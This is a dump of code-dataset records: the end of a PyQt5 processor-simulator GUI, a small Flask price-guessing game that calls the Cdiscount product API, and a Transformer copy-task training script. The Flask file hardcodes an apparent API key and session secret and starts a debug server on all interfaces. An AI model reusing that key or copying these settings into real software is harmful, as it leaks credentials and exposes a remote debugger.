self.update_inst_cache(RunSim_non_pipelined.memory.text_module.cache_module.cache_dict)\n #self.update_data_cache(RunSim_non_pipelined.memory.data_module.cache_module.cache_dict)\n\n\n # #code to add memory in memory text Box\n # dic = {19: 3, 4: 11, 6: 7, 241: 241}\n #self.update_memory(RiscSim.memory.memory_module.memory)\n #importlib.reload(temp_main)\n #importlib.reload(MachineCodeParser)\n\n\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n", "sub_path": "src/not_stable/GUI_Cache/gui_mem.py", "file_name": "gui_mem.py", "file_ext": "py", "file_size_in_byte": 25217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PyQt5.QtGui.QFont", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 16, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 19, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 19, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 21, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 22, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 22, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 23, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 28, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 28, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 29, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 31, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 31, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 32, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 36, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 36, 
"usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 37, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 39, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 39, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 40, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 44, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 44, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 45, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 45, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 47, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 47, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 48, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 48, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 51, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 52, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 52, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 54, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 54, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 55, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 55, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 58, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 58, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 59, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 59, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 61, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 61, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 62, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 62, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 66, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 66, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 68, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 68, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 69, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 69, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QRadioButton", "line_number": 72, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 72, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 73, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QRadioButton", "line_number": 76, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 76, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 77, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 77, "usage_type": "name"}, {"api_name": 
"PyQt5.QtWidgets.QRadioButton", "line_number": 80, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 80, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 81, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 81, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 85, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 85, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 86, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 86, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 87, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 87, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 88, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 88, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 90, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 90, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 91, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 91, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 92, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 92, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidget", "line_number": 103, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 103, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 104, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 104, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 110, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 110, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 111, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 111, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 112, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 112, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFrame", "line_number": 113, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 113, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 115, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 115, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 116, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 117, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 117, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidget", "line_number": 121, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 121, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 122, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 122, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 127, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 127, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 128, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 128, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 130, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 130, "usage_type": "name"}, 
{"api_name": "PyQt5.QtCore.QRect", "line_number": 131, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 131, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 133, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 133, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 134, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 134, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMenuBar", "line_number": 137, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 137, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 138, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 138, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QStatusBar", "line_number": 141, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 141, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QMetaObject.connectSlotsByName", "line_number": 146, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QMetaObject", "line_number": 146, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 146, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QCoreApplication", "line_number": 154, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 154, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 185, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 185, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 186, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 186, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 193, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 193, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 196, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 196, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 210, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 210, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 211, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 211, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 218, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 218, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 221, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 221, "usage_type": "name"}, {"api_name": "importlib.reload", "line_number": 240, "usage_type": "call"}, {"api_name": "importlib.reload", "line_number": 241, "usage_type": "call"}, {"api_name": "importlib.reload", "line_number": 242, "usage_type": "call"}, {"api_name": "importlib.reload", "line_number": 243, "usage_type": "call"}, {"api_name": "MachineCodeParser.parser", "line_number": 244, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 244, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory.InitMemory", "line_number": 245, "usage_type": "call"}, {"api_name": "RunSim_forward.memory", "line_number": 245, "usage_type": "attribute"}, {"api_name": "MachineCodeParser.PC_INST", "line_number": 245, "usage_type": "attribute"}, {"api_name": "MachineCodeParser.DATA", "line_number": 245, "usage_type": "attribute"}, {"api_name": 
"RunSim_stall.memory.InitMemory", "line_number": 246, "usage_type": "call"}, {"api_name": "RunSim_stall.memory", "line_number": 246, "usage_type": "attribute"}, {"api_name": "MachineCodeParser.PC_INST", "line_number": 246, "usage_type": "attribute"}, {"api_name": "MachineCodeParser.DATA", "line_number": 246, "usage_type": "attribute"}, {"api_name": "RunSim_non_pipelined.memory.InitMemory", "line_number": 247, "usage_type": "call"}, {"api_name": "RunSim_non_pipelined.memory", "line_number": 247, "usage_type": "attribute"}, {"api_name": "MachineCodeParser.PC_INST", "line_number": 247, "usage_type": "attribute"}, {"api_name": "MachineCodeParser.DATA", "line_number": 247, "usage_type": "attribute"}, {"api_name": "RunSim_non_pipelined.RunSim", "line_number": 254, "usage_type": "call"}, {"api_name": "RunSim_stall.RunSim", "line_number": 256, "usage_type": "call"}, {"api_name": "RunSim_forward.RunSim", "line_number": 258, "usage_type": "call"}, {"api_name": "RunSim_non_pipelined.memory", "line_number": 260, "usage_type": "attribute"}, {"api_name": "RunSim_non_pipelined.memory", "line_number": 261, "usage_type": "attribute"}, {"api_name": "RunSim_stall.memory", "line_number": 264, "usage_type": "attribute"}, {"api_name": "RunSim_stall.memory", "line_number": 265, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 268, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 269, "usage_type": "attribute"}, {"api_name": "RunSim_forward.registers", "line_number": 275, "usage_type": "attribute"}, {"api_name": "RunSim_forward.registers", "line_number": 276, "usage_type": "attribute"}, {"api_name": "RunSim_forward.registers", "line_number": 278, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 286, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 297, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 301, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 305, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 309, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 315, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 326, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 330, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 334, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 338, "usage_type": "attribute"}, {"api_name": "importlib.reload", "line_number": 343, "usage_type": "call"}, {"api_name": "importlib.reload", "line_number": 344, "usage_type": "call"}, {"api_name": "importlib.reload", "line_number": 345, "usage_type": "call"}, {"api_name": "importlib.reload", "line_number": 346, "usage_type": "call"}, {"api_name": "RunSim_non_pipelined.RunSim_step", "line_number": 350, "usage_type": "call"}, {"api_name": "RunSim_stall.RunSim_step", "line_number": 352, "usage_type": "call"}, {"api_name": "RunSim_stall.RunSim_step", "line_number": 354, "usage_type": "call"}, {"api_name": "RunSim_non_pipelined.memory", "line_number": 356, "usage_type": "attribute"}, {"api_name": "RunSim_non_pipelined.memory", "line_number": 357, "usage_type": "attribute"}, {"api_name": "RunSim_stall.memory", "line_number": 361, "usage_type": "attribute"}, {"api_name": "RunSim_stall.memory", "line_number": 362, "usage_type": "attribute"}, {"api_name": 
"RunSim_forward.memory", "line_number": 365, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 366, "usage_type": "attribute"}, {"api_name": "RunSim_forward.registers", "line_number": 372, "usage_type": "attribute"}, {"api_name": "RunSim_forward.registers", "line_number": 373, "usage_type": "attribute"}, {"api_name": "RunSim_forward.registers", "line_number": 375, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 383, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 394, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 398, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 402, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 406, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 412, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 423, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 427, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 431, "usage_type": "attribute"}, {"api_name": "RunSim_forward.memory", "line_number": 435, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 494, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 494, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 494, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 495, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 495, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 499, "usage_type": "call"}]} +{"seq_id": "539917392", "text": "#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport os\nimport requests\nimport json\nfrom random import randrange\nfrom flask import Flask, render_template, request, session\n\napp = Flask(__name__)\n\napp.secret_key = 'aLi\\24/caM\\11/Gas\\13/.'\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef home():\n if request.method == 'GET':\n url = \"https://api.cdiscount.com/OpenApi/json/Search\"\n params = {\n \"ApiKey\": \"38e82e08-ec23-4b46-ac36-3e3f903a264d\",\n \"SearchRequest\": {\n \"Keyword\": \"tv\",\n \"Pagination\": {\n \"ItemsPerPage\": 10,\n \"PageNumber\": 5\n },\n \"Filters\": {\n \"Price\": {\n \"Min\": 0,\n \"Max\": 0\n },\n \"Navigation\": \"\",\n \"IncludeMarketPlace\": \"false\",\n \"Condition\": None\n }\n }\n }\n\n response = requests.post(url, data=json.dumps(params))\n pr = json.loads(response.text)\n objet = pr['Products'][randrange(0, len(pr['Products']))]\n image = objet['MainImageUrl']\n price = round(float(objet['BestOffer']['SalePrice']), 2)\n name = objet['Name']\n session['produit'] = {'objet': objet, 'image': image, 'price': price, 'name': name}\n print(image, price, name)\n\n if request.method == 'POST':\n essaye = request.form['prix']\n print(essaye)\n if float(essaye) < session['produit']['price']:\n resultat = \"C'est plus ! essaye encore\"\n elif float(essaye) > session['produit']['price']:\n resultat = \"C'est moins ! 
essaye encore\"\n elif float(essaye) == session['produit']['price']:\n resultat = \"Bravo\"\n return render_template('home.html', resultat=resultat, produit=session['produit'], lastTry=essaye)\n else:\n return render_template('home.html', resultat=\"\", produit=session['produit'], lastTry=\"\")\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", debug= True)\n\n\n\n\n", "sub_path": "justprix.py", "file_name": "justprix.py", "file_ext": "py", "file_size_in_byte": 2090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 38, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 38, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 39, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 48, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "509114121", "text": "import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math, copy, time\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\nimport seaborn\nseaborn.set_context(context=\"talk\")\nfrom harvard.MultiHeadedAttention import MultiHeadedAttention\nfrom harvard.PositionwiseFeedForward import PositionwiseFeedForward\nfrom harvard.PositionalEncoding import PositionalEncoding\nfrom harvard.EncoderDecoder import EncoderDecoder\nfrom harvard.Encoder import Encoder\nfrom harvard.EncoderLayer import EncoderLayer\nfrom harvard.Decoder import Decoder\nfrom harvard.DecoderLayer import DecoderLayer\nfrom harvard.Embeddings import Embeddings\nfrom harvard.Generator import Generator\nfrom harvard.NoamOpt import NoamOpt\nfrom harvard.LabelSmoothing import LabelSmoothing\nfrom harvard.Batch import Batch\nfrom harvard.SimpleLossCompute import SimpleLossCompute\nfrom harvard.Tool import subsequent_mask\ndef make_model(src_vocab, tgt_vocab, N=6,\n d_model=512, d_ff=2048, h=8, dropout=0.1):\n \"Helper: Construct a model from hyperparameters.\"\n c = copy.deepcopy\n attn = MultiHeadedAttention(h, d_model)\n ff = PositionwiseFeedForward(d_model, d_ff, dropout)\n position = PositionalEncoding(d_model, dropout)\n model = EncoderDecoder(\n Encoder(EncoderLayer(d_model, c(attn), c(ff), dropout), N),\n Decoder(DecoderLayer(d_model, c(attn), c(attn),\n c(ff), dropout), N),\n nn.Sequential(Embeddings(d_model, src_vocab), c(position)),\n 
nn.Sequential(Embeddings(d_model, tgt_vocab), c(position)),\n Generator(d_model, tgt_vocab))\n\n # This was important from their code.\n # Initialize parameters with Glorot / fan_avg.\n for p in model.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n return model\n\ndef run_epoch(data_iter, model, loss_compute):\n \"Standard Training and Logging Function\"\n start = time.time()\n total_tokens = 0\n total_loss = 0\n tokens = 0\n for i, batch in enumerate(data_iter):\n out = model.forward(batch.src, batch.trg,\n batch.src_mask, batch.trg_mask)\n loss = loss_compute(out, batch.trg_y, batch.ntokens)\n total_loss += loss\n total_tokens += batch.ntokens\n tokens += batch.ntokens\n if i % 50 == 1:\n elapsed = time.time() - start\n print(\"Epoch Step: %d Loss: %f Tokens per Sec: %f\" %\n (i, loss / batch.ntokens, tokens / elapsed))\n start = time.time()\n tokens = 0\n return total_loss / total_tokens\n\nglobal max_src_in_batch, max_tgt_in_batch\ndef batch_size_fn(new, count, sofar):\n \"Keep augmenting batch and calculate total number of tokens + padding.\"\n global max_src_in_batch, max_tgt_in_batch\n if count == 1:\n max_src_in_batch = 0\n max_tgt_in_batch = 0\n max_src_in_batch = max(max_src_in_batch, len(new.src))\n max_tgt_in_batch = max(max_tgt_in_batch, len(new.trg) + 2)\n src_elements = count * max_src_in_batch\n tgt_elements = count * max_tgt_in_batch\n return max(src_elements, tgt_elements)\n\n\ndef get_std_opt(model):\n return NoamOpt(model.src_embed[0].d_model, 2, 4000,\n torch.optim.Adam(model.parameters(), lr=0, betas=(0.9, 0.98), eps=1e-9))\n\n# # Three settings of the lrate hyperparameters.\n# opts = [NoamOpt(512, 1, 4000, None),\n# NoamOpt(512, 1, 8000, None),\n# NoamOpt(256, 1, 4000, None)]\n# plt.plot(np.arange(1, 20000), [[opt.rate(i) for opt in opts] for i in range(1, 20000)])\n# plt.legend([\"512:4000\", \"512:8000\", \"256:4000\"])\n# None\n\n\n\n\n\n\ndef data_gen(V, batch, nbatches):\n \"Generate random data for a src-tgt copy task.\"\n for i in range(nbatches):\n data = torch.from_numpy(np.random.randint(1, V, size=(batch, 10)))\n data[:, 0] = 1\n src = Variable(data, requires_grad=False)\n tgt = Variable(data, requires_grad=False)\n yield Batch(src, tgt, 0)\n\n\n\n# Train the simple copy task.\nV = 11\ncriterion = LabelSmoothing(size=V, padding_idx=0, smoothing=0.0)\nmodel = make_model(V, V, N=2)\nmodel_opt = NoamOpt(model.src_embed[0].d_model, 1, 400,\n torch.optim.Adam(model.parameters(), lr=0, betas=(0.9, 0.98), eps=1e-9))\n\nfor epoch in range(10):\n model.train()\n run_epoch(data_gen(V, 30, 20), model,\n SimpleLossCompute(model.generator, criterion, model_opt))\n model.eval()\n print(run_epoch(data_gen(V, 30, 5), model,\n SimpleLossCompute(model.generator, criterion, None)))\n\ndef greedy_decode(model, src, src_mask, max_len, start_symbol):\n memory = model.encode(src, src_mask)\n ys = torch.ones(1, 1).fill_(start_symbol).type_as(src.data)\n for i in range(max_len-1):\n out = model.decode(memory, src_mask,\n Variable(ys),\n Variable(subsequent_mask(ys.size(1))\n .type_as(src.data)))\n prob = model.generator(out[:, -1])\n _, next_word = torch.max(prob, dim = 1)\n next_word = next_word.data[0]\n ys = torch.cat([ys,\n torch.ones(1, 1).type_as(src.data).fill_(next_word)], dim=1)\n return ys\n\nmodel.eval()\nsrc = Variable(torch.LongTensor([[1,2,3,4,5,6,7,8,9,10]]) )\nsrc_mask = Variable(torch.ones(1, 1, 10) )\nprint(greedy_decode(model, src, src_mask, max_len=10, start_symbol=1))\n\n\n\n\n\n\n\n\n\n", "sub_path": "harvard/Train.py", "file_name": "Train.py", 
"file_ext": "py", "file_size_in_byte": 5416, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "seaborn.set_context", "line_number": 9, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 28, "usage_type": "attribute"}, {"api_name": "harvard.MultiHeadedAttention.MultiHeadedAttention", "line_number": 29, "usage_type": "call"}, {"api_name": "harvard.PositionwiseFeedForward.PositionwiseFeedForward", "line_number": 30, "usage_type": "call"}, {"api_name": "harvard.PositionalEncoding.PositionalEncoding", "line_number": 31, "usage_type": "call"}, {"api_name": "harvard.EncoderDecoder.EncoderDecoder", "line_number": 32, "usage_type": "call"}, {"api_name": "harvard.Encoder.Encoder", "line_number": 33, "usage_type": "call"}, {"api_name": "harvard.EncoderLayer.EncoderLayer", "line_number": 33, "usage_type": "call"}, {"api_name": "harvard.Decoder.Decoder", "line_number": 34, "usage_type": "call"}, {"api_name": "harvard.DecoderLayer.DecoderLayer", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "harvard.Embeddings.Embeddings", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "harvard.Embeddings.Embeddings", "line_number": 37, "usage_type": "call"}, {"api_name": "harvard.Generator.Generator", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 44, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "name"}, {"api_name": "time.time", "line_number": 49, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}, {"api_name": "time.time", "line_number": 64, "usage_type": "call"}, {"api_name": "harvard.NoamOpt.NoamOpt", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 102, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 105, "usage_type": "call"}, {"api_name": "harvard.Batch.Batch", "line_number": 106, "usage_type": "call"}, {"api_name": "harvard.LabelSmoothing.LabelSmoothing", "line_number": 112, "usage_type": "call"}, {"api_name": "harvard.NoamOpt.NoamOpt", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 115, "usage_type": "attribute"}, {"api_name": "harvard.SimpleLossCompute.SimpleLossCompute", "line_number": 120, "usage_type": "call"}, {"api_name": "harvard.SimpleLossCompute.SimpleLossCompute", "line_number": 123, "usage_type": "call"}, {"api_name": 